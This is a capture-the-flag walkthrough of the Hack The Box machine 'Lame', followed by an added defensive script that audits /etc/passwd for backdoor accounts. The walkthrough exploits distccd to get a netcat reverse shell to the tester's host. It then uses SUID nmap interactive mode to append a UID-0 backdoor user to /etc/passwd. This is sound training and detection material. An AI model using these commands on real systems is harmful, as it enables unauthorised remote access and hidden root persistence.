Lame

tags: HTB Easy Linux OSCP
Platform: Hackthebox
Difficulty: Easy
OS: Linux

Enumeration

Nmap

First, we need to discover the open ports.

# nmap -p- -T4 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-12 16:46 CET
Nmap scan report for 10.10.10.3
Host is up (0.093s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

Nmap done: 1 IP address (1 host up) scanned in 91.52 seconds

Now let's explore these ports in more depth.

# nmap -A -Pn -p 21,22,139,445,3632 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-12 16:48 CET
Nmap scan report for 10.10.10.3
Host is up (0.093s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: broadband router|remote management|WAP|printer|general purpose|power-device
Running (JUST GUESSING): Arris embedded (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Linux 2.4.X|2.6.X (92%), Dell iDRAC 6 (92%), Raritan embedded (92%)
OS CPE: cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware
Aggressive OS guesses: Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.22 (92%), Linux 2.6.27 - 2.6.28 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Raritan Dominion PX DPXR20-20L power control unit (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h35m06s, deviation: 3h32m11s, median: 5m03s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-03-12T10:54:06-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   92.90 ms 10.10.14.1
2   92.94 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.84 seconds

OK, as we can see, there is a distccd daemon running. Searching on Google, we can find an RCE exploit for it.

Exploitation

To get a shell, we only need to run a listener in one terminal and execute the exploit in another.

# python distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "10.10.14.9 8787 -e /bin/sh"
[OK] Connected to remote service

--- BEGIN BUFFER ---

#: 10.10.14.9: command not found

--- END BUFFER ---

[OK] Done.
root [EvilBook] (10.10.14.9) /tmp
# python distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -p 3632 -c "nc 10.10.14.9 8787 -e /bin/sh"
[OK] Connected to remote service
[KO] Socket Timeout
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.3] 51687
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

And now, we can upgrade our shell with:

python -c "import pty; pty.spawn('/bin/bash')"
Ctrl+Z
stty raw -echo
fg
reset
screen
export TERM=screen;export SHELL=/bin/bash;stty rows 60 columns 235
/bin/bash

To get the user flag, we only need to browse to makis's home directory.

daemon@lame:/home/makis$ cat user.txt
CENSORED_FLAG

Post exploitation

Enumeration

SUID

Among the SUID binaries, we find that nmap is set SUID.

daemon@lame:/home/makis$ find / -perm /4000 2>/dev/null
.......................................................
.......................................................
/usr/bin/nmap
.......................................................
.......................................................

Privilege escalation

It is well known that nmap has an interactive mode, and we can run shell commands inside it as root because the binary is set SUID.

daemon@lame:/home/makis$ nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !whoami
root
system() execution of command failed
nmap>

As we can see, we can execute commands as root. Let's add a user to /etc/passwd and log in as root with it.

nmap> !echo "x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash" >> /etc/passwd
system() execution of command failed
nmap>
daemon@lame:/home/makis$ su x4v1l0k
Password:
root@lame:/home/makis# id
uid=0(root) gid=0(root) groups=0(root)
root@lame:/home/makis# cat /root/root.txt
CENSORED_FLAG
root@lame:/home/makis#
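From the defender's side, the /etc/passwd change made above is easy to spot. The following is an added example, not part of the original writeup: it audits passwd text for a second UID-0 account, an inline password hash where the shadow marker should be, an empty password field, and duplicate usernames. The sample input is constructed, with the line appended in the writeup as its last entry.

```python
"""Audit /etc/passwd for backdoor accounts like the one added in this writeup.

Added example, not part of the original writeup. Input is the text of
/etc/passwd; the sample below is constructed (minimal Ubuntu-style file)
with the writeup's injected line appended at the end.
"""
from typing import Dict, List

# Constructed sample: three normal entries plus the injected UID-0 account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
makis:x:1000:1000:makis,,,:/home/makis:/bin/bash
x4v1l0k:x4sRFbMkq2HHM:0:0:root:/root:/bin/bash
"""

# Values that mean "password lives in /etc/shadow" or "account locked".
SHADOW_MARKERS = ("x", "*", "!", "!!")


def parse_passwd(text: str) -> List[Dict[str, object]]:
    """Split passwd text into (lineno, fields) records, skipping blank lines."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if raw.strip():
            entries.append({"lineno": lineno, "fields": raw.split(":")})
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings: List[str] = []
    seen_names = set()
    for e in parse_passwd(text):
        f = e["fields"]
        if len(f) != 7:
            findings.append(f"line {e['lineno']}: malformed entry ({len(f)} fields)")
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = f
        if name in seen_names:
            findings.append(f"line {e['lineno']}: duplicate username {name!r}")
        seen_names.add(name)
        if pw == "":
            findings.append(f"line {e['lineno']}: empty password field for {name!r}")
        elif pw not in SHADOW_MARKERS:
            # A real hash here bypasses /etc/shadow and is readable by everyone.
            findings.append(f"line {e['lineno']}: inline password hash for {name!r}")
        if uid == "0" and name != "root":
            # Any second UID-0 account is effectively root.
            findings.append(f"line {e['lineno']}: non-root account {name!r} has UID 0")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

On a live host, read the real file with `open("/etc/passwd").read()` in place of the constructed sample.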